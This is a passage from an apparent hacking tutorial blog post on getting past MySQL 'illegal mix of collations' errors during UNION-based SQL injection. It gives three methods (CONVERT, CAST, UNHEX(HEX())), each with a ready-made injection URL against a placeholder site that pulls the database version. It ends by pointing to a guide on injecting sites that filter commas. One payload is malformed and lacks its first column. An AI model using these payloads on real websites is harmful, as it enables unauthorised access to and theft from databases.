A name ending in _bin indicates a binary collation. Character comparisons are based on character binary code values

# Method 2

By using function CONVERT
CONVERT() provides a way to convert data between different character sets. The syntax is: CONVERT(expr USING transcoding_name).
http://vuln-web.com/?id=1 and 0 UNION SELECT,convert(version() using binary),3,4,5,6,7,8--

# Method 3

Use function CAST

you can also use CAST() to convert a string to a different character set. The syntax is: CAST(character_string AS character_data_type CHARACTER SET charset_name).

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,cast(version()as binary),3,4,5,6,7,8--
Read More: Inject a site when commas are block

# Method 4

Use function UNHEX(HEX(xx))
UNHEX() –> Return a string containing hex representation
HEX() –> Return a hexadecimal representation of a decimal or string value

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,UNHEX(HEX(version())),3,4,5,6,7,8--

Hope, this will help you in illegal mix of collation error. Keep learning and practising.

Thanks for reading guys. 🙂